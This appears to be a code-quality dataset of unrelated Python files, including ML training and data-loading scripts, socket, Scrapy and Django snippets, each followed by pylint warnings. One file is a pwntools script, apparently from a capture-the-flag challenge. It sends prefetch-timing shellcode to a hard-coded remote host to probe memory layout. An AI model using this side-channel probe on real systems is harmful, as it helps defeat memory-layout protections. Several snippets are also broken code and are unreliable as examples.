num_workers=0, shuffle=True, drop_last=True)# 56 57 log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt') 58 59 60 def main(): 61 net = SDCNet(num_classes = 5).cuda().train() # 62 63 print('training in ' + exp_name) 64 optimizer = optim.SGD([ 65 {'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'], 66 'lr': 2 * args['lr']}, 67 {'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'], 68 'lr': args['lr'], 'weight_decay': args['weight_decay']} 69 ], momentum=args['momentum']) 70 71 if len(args['snapshot']) > 0: 72 print('training resumes from ' + args['snapshot']) 73 net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth'))) 74 optimizer.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '_optim.pth'))) 75 optimizer.param_groups[0]['lr'] = 2 * args['lr'] 76 optimizer.param_groups[1]['lr'] = args['lr'] 77 78 check_mkdir(ckpt_path) 79 check_mkdir(os.path.join(ckpt_path, exp_name)) 80 open(log_path, 'w').write(str(args) + '\n\n') 81 train(net, optimizer) 82 83 84 def train(net, optimizer): 85 start_time = time.time() 86 curr_iter = args['last_iter'] 87 num_class = [0, 0, 0, 0, 0] 88 while True: 89 total_loss_record, loss0_record, loss1_record, loss2_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter() 90 91 batch_time = AvgMeter() 92 end = time.time() 93 print('-----begining the first stage, train_mode==0-----') 94 for i, data in enumerate(train_loader): 95 optimizer.param_groups[0]['lr'] = 2 * args['lr'] * (1 - float(curr_iter) / args['iter_num'] 96 ) ** args['lr_decay'] 97 optimizer.param_groups[1]['lr'] = args['lr'] * (1 - float(curr_iter) / args['iter_num'] 98 ) ** args['lr_decay'] 99 100 inputs, gt, labels = data 101 print(labels) 102 # depends on the num of classes 103 cweight = torch.tensor([0.5, 0.75, 1, 1.25, 1.5]) 104 #weight = torch.ones(size=gt.shape) 105 weight = gt.clone().detach() 106 sizec = labels.numpy() 107 #ta = np.zeros(shape=gt.shape) 108 ''' 109 np.zeros(shape=labels.shape) 110 sc = gt.clone().detach() 111 for i in range(len(sizec)): 112 gta = np.array(to_pil(sc[i,:].data.squeeze(0).cpu()))# 113 #print(gta.shape) 114 labels[i] = cal_sc(gta) 115 sizec[i] = labels[i] 116 print(labels) 117 ''' 118 batch_size = inputs.size(0) 119 inputs = Variable(inputs).cuda() 120 gt = Variable(gt).cuda() 121 labels = Variable(labels).cuda() 122 123 #print(sizec.shape) 124 125 optimizer.zero_grad() 126 p5, p4, p3, p2, p1, predict1, predict2, predict3, predict4, predict5, predict6, predict7, predict8, predict9, predict10, predict11 = net(inputs, sizec) # mode=1 127 128 criterion = nn.BCEWithLogitsLoss().cuda() 129 criterion2 = nn.CrossEntropyLoss().cuda() 130 131 gt2 = gt.long() 132 gt2 = gt2.squeeze(1) 133 134 l5 = criterion2(p5, gt2) 135 l4 = criterion2(p4, gt2) 136 l3 = criterion2(p3, gt2) 137 l2 = criterion2(p2, gt2) 138 l1 = criterion2(p1, gt2) 139 140 loss0 = criterion(predict11, gt) 141 loss10 = criterion(predict10, gt) 142 loss9 = criterion(predict9, gt) 143 loss8 = criterion(predict8, gt) 144 loss7 = criterion(predict7, gt) 145 loss6 = criterion(predict6, gt) 146 loss5 = criterion(predict5, gt) 147 loss4 = criterion(predict4, gt) 148 loss3 = criterion(predict3, gt) 149 loss2 = criterion(predict2, gt) 150 loss1 = criterion(predict1, gt) 151 152 total_loss = l1 + l2 + l3 + l4 + l5 + loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6 + loss7 + loss8 + loss9 + loss10 153 154 total_loss.backward() 155 optimizer.step() 156 157 total_loss_record.update(total_loss.item(), batch_size) 158 loss1_record.update(l5.item(), batch_size) 159 loss0_record.update(loss0.item(), batch_size) 160 161 curr_iter += 1.0 162 batch_time.update(time.time() - end) 163 end = time.time() 164 165 log = '[iter %d], [R1/Mode0], [total loss %.5f]\n' \ 166 '[l5 %.5f], [loss0 %.5f]\n' \ 167 '[lr %.13f], [time %.4f]' % \ 168 (curr_iter, total_loss_record.avg, loss1_record.avg, loss0_record.avg, optimizer.param_groups[1]['lr'], 169 batch_time.avg) 170 print(log) 171 print('Num of class:', num_class) 172 open(log_path, 'a').write(log + '\n') 173 174 if curr_iter == args['iter_num']: 175 torch.save(net.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % curr_iter)) 176 torch.save(optimizer.state_dict(), 177 os.path.join(ckpt_path, exp_name, '%d_optim.pth' % curr_iter)) 178 total_time = time.time() - start_time 179 print(total_time) 180 return 181 182 183 if __name__ == '__main__': 184 main()
16 - error: no-name-in-module 80 - refactor: consider-using-with 80 - warning: unspecified-encoding 84 - refactor: too-many-locals 108 - warning: pointless-string-statement 172 - refactor: consider-using-with 172 - warning: unspecified-encoding 84 - refactor: too-many-statements 89 - warning: unused-variable 94 - warning: unused-variable 103 - warning: unused-variable 105 - warning: unused-variable 12 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 17 - warning: unused-import 18 - warning: unused-import
1 import numpy as np 2 import os 3 4 import torch 5 from PIL import Image 6 from torch.autograd import Variable 7 from torchvision import transforms 8 from torch.utils.data import DataLoader 9 import matplotlib.pyplot as plt 10 import pandas as pd 11 from tqdm import tqdm 12 import cv2 13 import numpy as np 14 15 from config import ecssd_path, hkuis_path, pascals_path, sod_path, dutomron_path, MTDD_test_path 16 from misc import check_mkdir, crf_refine, AvgMeter, cal_precision_recall_mae, cal_fmeasure 17 from datasets import TestFolder_joint 18 import joint_transforms 19 from model import HSNet_single1, HSNet_single1_ASPP, HSNet_single1_NR, HSNet_single2, SDMS_A, SDMS_C 20 21 torch.manual_seed(2018) 22 23 # set which gpu to use 24 torch.cuda.set_device(0) 25 26 ckpt_path = './ckpt' 27 test_path = './test_ECSSD.csv' 28 29 30 def main(): 31 img = np.zeros((512, 512),dtype = np.uint8) 32 img2 = cv2.imread('./0595.PNG', 0) 33 cv2.imshow('img',img2) 34 #cv2.waitKey(0) 35 print(img, img2) 36 Image.fromarray(img).save('./free.png') 37 38 39 40 if __name__ == '__main__': 41 main()
13 - warning: reimported 17 - error: no-name-in-module 2 - warning: unused-import 6 - warning: unused-import 7 - warning: unused-import 8 - warning: unused-import 9 - warning: unused-import 10 - warning: unused-import 11 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 17 - warning: unused-import 18 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import
1 import os 2 import os.path 3 4 import torch.utils.data as data 5 from PIL import Image 6 7 8 class ImageFolder_joint(data.Dataset): 9 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 10 def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None): 11 imgs = [] 12 self.label_list = label_list 13 for index, row in label_list.iterrows(): 14 imgs.append((row['img_path'], row['gt_path'], row['label'])) 15 self.imgs = imgs 16 self.joint_transform = joint_transform 17 self.transform = transform 18 self.target_transform = target_transform 19 20 def __len__(self): 21 return len(self.label_list) 22 23 def __getitem__(self, index): 24 img_path, gt_path, label = self.imgs[index] 25 img = Image.open(img_path).convert('RGB') 26 target = Image.open(gt_path).convert('L') 27 if self.joint_transform is not None: 28 img, target = self.joint_transform(img, target) 29 if self.transform is not None: 30 img = self.transform(img) 31 if self.target_transform is not None: 32 target = self.target_transform(target) 33 34 return img, target, label 35 36 class ImageFolder_joint_for_edge(data.Dataset): 37 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 38 def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None): 39 imgs = [] 40 for index, row in label_list.iterrows(): 41 imgs.append((row['img_path'], row['gt_path'], row['label'])) 42 self.imgs = imgs 43 self.joint_transform = joint_transform 44 self.transform = transform 45 self.target_transform = target_transform 46 47 def __getitem__(self, index): 48 img_path, gt_path, label = self.imgs[index] 49 edge_path = "."+gt_path.split(".")[1]+"_edge."+gt_path.split(".")[2] 50 img = Image.open(img_path).convert('RGB') 51 target = Image.open(gt_path).convert('L') 52 target_edge = Image.open(edge_path).convert('L') 53 if self.joint_transform is not None: 54 if img.size != target.size or img.size != target_edge.size: 55 print("error path:", img_path, gt_path) 56 print("size:", img.size, target.size, target_edge.size) 57 img, target, target_edge = self.joint_transform(img, target, target_edge) 58 if self.transform is not None: 59 img = self.transform(img) 60 if self.target_transform is not None: 61 target = self.target_transform(target) 62 target_edge = self.target_transform(target_edge) 63 64 return img, target, target_edge, label 65 66 def __len__(self): 67 return len(self.imgs) 68 69 class TestFolder_joint(data.Dataset): 70 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 71 def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None): 72 imgs = [] 73 for index, row in label_list.iterrows(): 74 imgs.append((row['img_path'], row['gt_path'], row['label'])) 75 self.imgs = imgs 76 self.joint_transform = joint_transform 77 self.transform = transform 78 self.target_transform = target_transform 79 80 def __getitem__(self, index): 81 img_path, gt_path, label = self.imgs[index] 82 img = Image.open(img_path).convert('RGB') 83 target = Image.open(gt_path).convert('L') 84 if self.joint_transform is not None: 85 img, target = self.joint_transform(img, target) 86 if self.transform is not None: 87 img = self.transform(img) 88 if self.target_transform is not None: 89 target = self.target_transform(target) 90 91 return img, target, label, img_path 92 93 def __len__(self): 94 return len(self.imgs) 95 96 97 def make_dataset(root): 98 img_list = [os.path.splitext(f)[0] for f in os.listdir(root) if f.endswith('.jpg')] 99 return [(os.path.join(root, img_name + '.jpg'), os.path.join(root, img_name + '.png')) for img_name in img_list] 100 101 102 class ImageFolder(data.Dataset): 103 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 104 def __init__(self, root, joint_transform=None, transform=None, target_transform=None): 105 self.root = root 106 self.imgs = make_dataset(root) 107 self.joint_transform = joint_transform 108 self.transform = transform 109 self.target_transform = target_transform 110 111 def __getitem__(self, index): 112 img_path, gt_path = self.imgs[index] 113 img = Image.open(img_path).convert('RGB') 114 target = Image.open(gt_path).convert('L') 115 if self.joint_transform is not None: 116 img, target = self.joint_transform(img, target) 117 if self.transform is not None: 118 img = self.transform(img) 119 if self.target_transform is not None: 120 target = self.target_transform(target) 121 122 return img, target 123 124 def __len__(self): 125 return len(self.imgs)
4 - refactor: consider-using-from-import 13 - warning: unused-variable 40 - warning: unused-variable 73 - warning: unused-variable
1 import numpy as np 2 import os 3 4 import torch 5 from PIL import Image 6 from torch.autograd import Variable 7 from torchvision import transforms 8 from torch.utils.data import DataLoader 9 import matplotlib.pyplot as plt 10 import pandas as pd 11 from tqdm import tqdm 12 13 path_list = ['msra10k', 'ECSSD', 'DUT-OMROM', 'DUTS-TR', 'DUTS-TE', 'HKU-IS', 'PASCAL-S', 'SED2', 'SOC', 'SOD', 'THUR-15K'] 14 15 def main(): 16 Dataset, Class0, Class1, Class2, Class3, Class4, Class5, Class6, Class7, Class8, Class9, Class10, Total = [], [], [], [], [], [], [], [], [], [], [], [], [] 17 for data_path in path_list: 18 test_path = './SOD_label/label_' + data_path + '.csv' 19 print('Evalute for ' + test_path) 20 test_data = pd.read_csv(test_path) 21 imgs = [] 22 num, c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10 = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 23 for index, row in test_data.iterrows(): 24 imgs.append((row['img_path'], row['gt_path'], row['label'])) 25 img_path, gt_path, label = imgs[index] 26 27 if label == 0: 28 c0 += 1 29 elif label == 1: 30 c1 += 1 31 elif label == 2: 32 c2 += 1 33 elif label == 3: 34 c3 += 1 35 elif label == 4: 36 c4 += 1 37 elif label == 5: 38 c5 += 1 39 elif label == 6: 40 c6 += 1 41 elif label == 7: 42 c7 += 1 43 elif label == 8: 44 c8 += 1 45 elif label == 9: 46 c9 += 1 47 elif label == 10: 48 c10 += 1 49 num += 1 50 print('[Class0 %.f], [Class1 %.f], [Class2 %.f], [Class3 %.f]\n'\ 51 '[Class4 %.f], [Class5 %.f], [Class6 %.f], [Class7 %.f]\n'\ 52 '[Class8 %.f], [Class9 %.f], [Class10 %.f], [Total %.f]\n'%\ 53 (c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, num) 54 ) 55 Dataset.append(data_path) 56 Class0.append(c0) 57 Class1.append(c1) 58 Class2.append(c2) 59 Class3.append(c3) 60 Class4.append(c4) 61 Class5.append(c5) 62 Class6.append(c6) 63 Class7.append(c7) 64 Class8.append(c8) 65 Class9.append(c9) 66 Class10.append(c10) 67 Total.append(num) 68 69 label_file = pd.DataFrame({'Datasets': Dataset, 'Class 0': Class0, 'Class 1': Class1, 'Class 2': Class2, 'Class 3': Class3, 'Class 4': Class4, 'Class 5': Class5, 'Class 6': Class6, 'Class 7': Class7, 'Class 8': Class8, 'Class 9': Class9, 'Class 10': Class10, 'Num of Pic': Total}) 70 label_file = label_file[['Datasets', 'Class 0', 'Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5', 'Class 6', 'Class 7', 'Class 8', 'Class 9', 'Class 10', 'Num of Pic']] 71 72 label_file.to_csv('./Dataset_statistics.csv', index=False) 73 74 if __name__ == '__main__': 75 main()
15 - refactor: too-many-locals 15 - refactor: too-many-branches 25 - warning: unused-variable 25 - warning: unused-variable 1 - warning: unused-import 2 - warning: unused-import 4 - warning: unused-import 5 - warning: unused-import 6 - warning: unused-import 7 - warning: unused-import 8 - warning: unused-import 9 - warning: unused-import 11 - warning: unused-import
1 from setuptools import setup 2 3 setup( 4 name='pyhfss_parser', 5 version='0.0.0', 6 packages=['', 'venv.Lib.site-packages.py', 'venv.Lib.site-packages.py._io', 'venv.Lib.site-packages.py._log', 7 'venv.Lib.site-packages.py._code', 'venv.Lib.site-packages.py._path', 8 'venv.Lib.site-packages.py._process', 'venv.Lib.site-packages.py._vendored_packages', 9 'venv.Lib.site-packages.pip', 'venv.Lib.site-packages.pip._vendor', 10 'venv.Lib.site-packages.pip._vendor.idna', 'venv.Lib.site-packages.pip._vendor.pytoml', 11 'venv.Lib.site-packages.pip._vendor.certifi', 'venv.Lib.site-packages.pip._vendor.chardet', 12 'venv.Lib.site-packages.pip._vendor.chardet.cli', 'venv.Lib.site-packages.pip._vendor.distlib', 13 'venv.Lib.site-packages.pip._vendor.distlib._backport', 'venv.Lib.site-packages.pip._vendor.msgpack', 14 'venv.Lib.site-packages.pip._vendor.urllib3', 'venv.Lib.site-packages.pip._vendor.urllib3.util', 15 'venv.Lib.site-packages.pip._vendor.urllib3.contrib', 16 'venv.Lib.site-packages.pip._vendor.urllib3.contrib._securetransport', 17 'venv.Lib.site-packages.pip._vendor.urllib3.packages', 18 'venv.Lib.site-packages.pip._vendor.urllib3.packages.backports', 19 'venv.Lib.site-packages.pip._vendor.urllib3.packages.ssl_match_hostname', 20 'venv.Lib.site-packages.pip._vendor.colorama', 'venv.Lib.site-packages.pip._vendor.html5lib', 21 'venv.Lib.site-packages.pip._vendor.html5lib._trie', 22 'venv.Lib.site-packages.pip._vendor.html5lib.filters', 23 'venv.Lib.site-packages.pip._vendor.html5lib.treewalkers', 24 'venv.Lib.site-packages.pip._vendor.html5lib.treeadapters', 25 'venv.Lib.site-packages.pip._vendor.html5lib.treebuilders', 'venv.Lib.site-packages.pip._vendor.lockfile', 26 'venv.Lib.site-packages.pip._vendor.progress', 'venv.Lib.site-packages.pip._vendor.requests', 27 'venv.Lib.site-packages.pip._vendor.packaging', 'venv.Lib.site-packages.pip._vendor.cachecontrol', 28 'venv.Lib.site-packages.pip._vendor.cachecontrol.caches', 29 'venv.Lib.site-packages.pip._vendor.webencodings', 'venv.Lib.site-packages.pip._vendor.pkg_resources', 30 'venv.Lib.site-packages.pip._internal', 'venv.Lib.site-packages.pip._internal.req', 31 'venv.Lib.site-packages.pip._internal.vcs', 'venv.Lib.site-packages.pip._internal.utils', 32 'venv.Lib.site-packages.pip._internal.models', 'venv.Lib.site-packages.pip._internal.commands', 33 'venv.Lib.site-packages.pip._internal.operations', 'venv.Lib.site-packages.attr', 34 'venv.Lib.site-packages.pluggy', 'venv.Lib.site-packages._pytest', 'venv.Lib.site-packages._pytest.mark', 35 'venv.Lib.site-packages._pytest._code', 'venv.Lib.site-packages._pytest.config', 36 'venv.Lib.site-packages._pytest.assertion', 'venv.Lib.site-packages.colorama', 37 'venv.Lib.site-packages.atomicwrites', 'venv.Lib.site-packages.parsimonious', 38 'venv.Lib.site-packages.parsimonious.tests', 'venv.Lib.site-packages.more_itertools', 39 'venv.Lib.site-packages.more_itertools.tests', 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip', 40 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.req', 41 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.vcs', 42 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.utils', 43 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.compat', 44 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.models', 45 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor', 46 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib', 47 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib._backport', 48 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.colorama', 49 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib', 50 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib._trie', 51 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.filters', 52 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treewalkers', 53 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treeadapters', 54 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treebuilders', 55 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.lockfile', 56 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.progress', 57 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests', 58 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages', 59 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.chardet', 60 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3', 61 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.util', 62 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.contrib', 63 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages', 64 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages.ssl_match_hostname', 65 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.packaging', 66 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol', 67 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol.caches', 68 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.webencodings', 69 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.pkg_resources', 70 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.commands', 71 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.operations'], 72 url='', 73 license='MIT', 74 author='Ariksu', 75 author_email='ariksu@gmail.com', 76 description='Attempt to write peg-parser for .hfss' 77 )
Clean Code: No Issues Detected
1 from pwn import * 2 import time 3 4 context.update(arch='x86', bits=64) 5 6 iteration = 0x1000 7 cache_cycle = 0x10000000 8 9 shellcode = asm(''' 10 _start: 11 mov rdi, 0x200000000 12 mov rsi, 0x300000000 13 mov rbp, 0 14 loop_start: 15 rdtsc 16 shl rdx, 32 17 or rax, rdx 18 push rax 19 mov rax, rdi 20 mov rdx, %d 21 a: 22 mov rcx, 0x1000 23 a2: 24 prefetcht1 [rax+rcx] 25 loop a2 26 dec edx 27 cmp edx, 0 28 ja a 29 b: 30 rdtsc 31 shl rdx, 32 32 or rax, rdx 33 pop rbx 34 sub rax, rbx 35 cmp rax, %d 36 jb exists 37 mov byte ptr [rsi], 1 38 jmp next 39 exists: 40 mov byte ptr [rsi], 0 41 next: 42 inc rsi 43 inc rbp 44 add rdi, 0x2000 45 cmp rbp, 64 46 jne loop_start 47 end: 48 int3 49 ''' % (iteration, cache_cycle)) 50 HOST, PORT = '0.0.0.0', 31337 51 HOST, PORT = '202.120.7.198', 13579 52 r = remote(HOST, PORT) 53 p = time.time() 54 r.send(p32(len(shellcode)) + shellcode) 55 print r.recvall() 56 print time.time() - p 57
55 - error: syntax-error
1 assembly = ''' 2 7328- 400560: c5 f9 6e c7 vmovd %edi,%xmm0 3 7378- 400564: c4 e2 7d 58 c0 vpbroadcastd %xmm0,%ymm0 4 7435- 400569: c5 fd 76 0e vpcmpeqd (%rsi),%ymm0,%ymm1 5 7495- 40056d: c5 fd 76 56 20 vpcmpeqd 0x20(%rsi),%ymm0,%ymm2 6 7559- 400572: c5 fd 76 5e 40 vpcmpeqd 0x40(%rsi),%ymm0,%ymm3 7 7623- 400577: c5 fd 76 86 80 00 00 vpcmpeqd 0x80(%rsi),%ymm0,%ymm0 8 7687- 40057e: 00 9 7701- 40057f: c5 f5 6b ca vpackssdw %ymm2,%ymm1,%ymm1 10 7761- 400583: c5 e5 6b c0 vpackssdw %ymm0,%ymm3,%ymm0 11 7821- 400587: c5 f5 63 c0 vpacksswb %ymm0,%ymm1,%ymm0 12 7881- 40058b: c5 fd d7 c0 vpmovmskb %ymm0,%eax 13 7934- 40058f: c5 f8 77 vzeroupper 14 ''' 15 16 print(assembly) 17 lines = assembly.strip().splitlines() 18 i = 0 19 while True: 20 if i >= len(lines): 21 break 22 line = lines[i] 23 i += 1 24 line = line[line.find(':') + 3:] 25 byte1 = line[:2] if len(line) >= 2 else ' ' 26 byte2 = line[3:5] if len(line) >= 5 else ' ' 27 byte3 = line[6:8] if len(line) >= 8 else ' ' 28 byte4 = line[9:11] if len(line) >= 11 else ' ' 29 byte5 = line[12:14] if len(line) >= 14 else ' ' 30 byte6 = line[15:17] if len(line) >= 17 else ' ' 31 byte7 = line[18:20] if len(line) >= 20 else ' ' 32 if byte6 != ' ': 33 comment = line[24:] 34 line = lines[i] 35 i += 1 36 line = line[line.find(':') + 3:] 37 byte8 = line[:2] if len(line) >= 2 else ' ' 38 print(' QUAD $0x%s%s%s%s%s%s%s%s // %s' % (byte8, byte7, byte6, byte5, byte4, byte3, byte2, byte1, comment)) 39 elif byte5 != ' ': 40 print(' LONG $0x%s%s%s%s; BYTE $0x%s // %s' % (byte4, byte3, byte2, byte1, byte5, line[24:])) 41 elif byte4 != ' ': 42 print(' LONG $0x%s%s%s%s // %s' % (byte4, byte3, byte2, byte1, line[24:])) 43 elif byte3 != ' ': 44 print(' WORD $0x%s%s; BYTE $0x%s // %s' % (byte2, byte1, byte3, line[24:]))
Clean Code: No Issues Detected
1 from white_board import WhiteBoard 2 import json 3 4 ''' 5 This file is used to run locally or to debug 6 ''' 7 8 with open('config.json') as json_file: 9 start_config = json.load(json_file) 10 11 12 def main(): 13 board = WhiteBoard("client", start_config) 14 board.start_local() 15 16 17 if __name__ == '__main__': 18 main()
4 - warning: pointless-string-statement 8 - warning: unspecified-encoding
1 import socket 2 import json 3 import sys 4 import math 5 from white_board import WhiteBoard, binary_to_dict 6 7 ''' 8 Ouverture de la configuration initiale stockée dans config.json qui contient le mode d'écriture, la couleur et 9 la taille d'écriture. 10 Ces Paramètres sont ensuite à modifier par l'utisateur dans l'interface pygame 11 ''' 12 13 with open('config.json') as json_file: 14 start_config = json.load(json_file) 15 16 ''' 17 définition de l'adresse IP du serveur. Ici le serveur est en local. 18 ''' 19 hote = start_config["ip_serveur"] 20 21 port = 5001 22 23 24 def main(): 25 """ 26 Création d'un socket pour communiquer via un protocole TCP/IP 27 """ 28 connexion_avec_serveur = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 # Connexion au serveur 30 try: 31 connexion_avec_serveur.connect((hote, port)) 32 except (TimeoutError, ConnectionRefusedError, ConnectionResetError, ConnectionAbortedError) as e: 33 return print("Le serveur n'a pas répondu, vérifiez les paramètres de connexion") 34 print("Connexion réussie avec le serveur") 35 36 # First get the client id 37 username = binary_to_dict(connexion_avec_serveur.recv(2 ** 16))["client_id"] 38 39 # Second get the message size 40 msg_recu = connexion_avec_serveur.recv(2 ** 8) 41 message_size = binary_to_dict(msg_recu)["message_size"] 42 43 # Then get the first chunk of history using the number of byte equal to the power of 2 just above its size 44 msg_recu = connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1)) 45 total_size_received = sys.getsizeof(msg_recu) 46 47 # One we get the first chunk, we loop until we get the whole history 48 while total_size_received < message_size: 49 msg_recu += connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1)) 50 51 total_size_received = sys.getsizeof(msg_recu) 52 msg_decode = binary_to_dict(msg_recu) 53 hist = msg_decode 54 55 # Après réception de l'état du whiteboard, c'est à dire des figures et textboxes déjà dessinées par des utilisateurs 56 # précédents, le programme lance un whiteboard 57 whiteboard = WhiteBoard(username, start_config, hist) 58 whiteboard.start(connexion_avec_serveur) 59 60 61 if __name__ == '__main__': 62 main()
7 - warning: pointless-string-statement 13 - warning: unspecified-encoding 16 - warning: pointless-string-statement 24 - refactor: inconsistent-return-statements 32 - warning: unused-variable
1 from oauth2_provider.views.generic import ProtectedResourceView 2 from django.http import HttpResponse
1 - warning: unused-import 2 - warning: unused-import
1 # This script is written under the username admin, with project name Retrofm 2 # Change the class name AdminRetrofmSpider accordingly 3 import datetime 4 5 _start_date = datetime.date(2012, 12, 25) 6 _initial_date = datetime.date(2012, 12, 25) 7 _priority = 0 8 start_urls = ['http://retrofm.ru'] 9 10 11 def parse(self, response): 12 while AdminRetrofmSpider._start_date < self.datetime.date.today(): 13 AdminRetrofmSpider._priority -= 1 14 AdminRetrofmSpider._start_date += self.datetime.timedelta(days=1) 15 theurlstart = 'http://retrofm.ru/index.php?go=Playlist&date=%s' % ( 16 AdminRetrofmSpider._start_date.strftime("%d.%m.%Y")) 17 theurls = [] 18 theurls.append(theurlstart + '&time_start=17%3A00&time_stop=23%3A59') 19 theurls.append(theurlstart + '&time_start=11%3A00&time_stop=17%3A01') 20 theurls.append(theurlstart + '&time_start=05%3A00&time_stop=11%3A01') 21 theurls.append(theurlstart + '&time_start=00%3A00&time_stop=05%3A01') 22 23 for theurl in theurls: 24 request = Request(theurl, method="GET", 25 dont_filter=True, priority=(AdminRetrofmSpider._priority), callback=self.parse) 26 self.insert_link(request)
12 - warning: protected-access 12 - error: undefined-variable 13 - error: undefined-variable 14 - error: undefined-variable 16 - warning: protected-access 16 - error: undefined-variable 24 - error: undefined-variable 25 - warning: protected-access 25 - error: undefined-variable 11 - warning: unused-argument
1 # -*- coding: utf-8 -*- 2 3 # Define here the models for your scraped items 4 # 5 # See documentation in: 6 # https://doc.scrapy.org/en/latest/topics/items.html 7 8 import scrapy 9 from scrapy.item import Item ,Field 10 11 from scrapy.loader import ItemLoader 12 from scrapy.loader.processors import TakeFirst, MapCompose, Join 13 14 class DemoLoader(ItemLoader): 15 default_output_processor = TakeFirst() 16 title_in = MapCompose(unicode.title) 17 title_out = Join() 18 size_in = MapCompose(unicode.strip) 19 # you can continue scraping here 20 class DemoItem(scrapy.Item): 21 22 23 # define the fields for your item here like: 24 product_title = scrapy.Field() 25 product_link = scrapy.Field() 26 27 product_description = scrapy.Field() 28 29 pass
15 - warning: bad-indentation 16 - warning: bad-indentation 17 - warning: bad-indentation 18 - warning: bad-indentation 16 - error: undefined-variable 18 - error: undefined-variable 14 - refactor: too-few-public-methods 29 - warning: unnecessary-pass 20 - refactor: too-few-public-methods 9 - warning: unused-import 9 - warning: unused-import
1 from django.db import models 2 from blog.models import Post 3 # Creating a comment systems 4 class Comment(models.Model): 5 post = models.ForeignKey(Post, 6 on_delete=models.CASCADE, 7 related_name='comments') 8 name=models.CharField(max_length=200) 9 email=models.EmailField() 10 body=models.TextField() 11 created=models.DateTimeField(auto_now_add=True) 12 updated=models.DateTimeField(auto_now_add=True) 13 active=models.BooleanField(default=True) 14 15 class Meta: 16 ordering=('created',) 17 18 def __str__(self): 19 return f'comment by {self.name}on{self.post}' 20 21
15 - refactor: too-few-public-methods 4 - refactor: too-few-public-methods
1 from django.db import models 2 from django.contrib.auth.models import User 3 4 5 class Project(models.Model): 6 project_name = models.CharField(max_length=50) 7 user = models.ForeignKey(User) 8 link_generator = models.TextField(blank=True) 9 scraper_function = models.TextField(blank=True) 10 settings_scraper = models.TextField(blank=True) 11 settings_link_generator = models.TextField(blank=True) 12 13 def __str__(self): 14 return "%s by %s" % (self.project_name, self.user.username) 15 16 17 class Item(models.Model): 18 item_name = models.CharField(max_length=50) 19 project = models.ForeignKey(Project, on_delete=models.CASCADE) 20 21 def __str__(self): 22 return self.item_name 23 24 25 class Field(models.Model): 26 field_name = models.CharField(max_length=50) 27 item = models.ForeignKey(Item, on_delete=models.CASCADE) 28 29 def __str__(self): 30 return self.field_name 31 32 33 class Pipeline(models.Model): 34 pipeline_name = models.CharField(max_length=50) 35 pipeline_order = models.IntegerField() 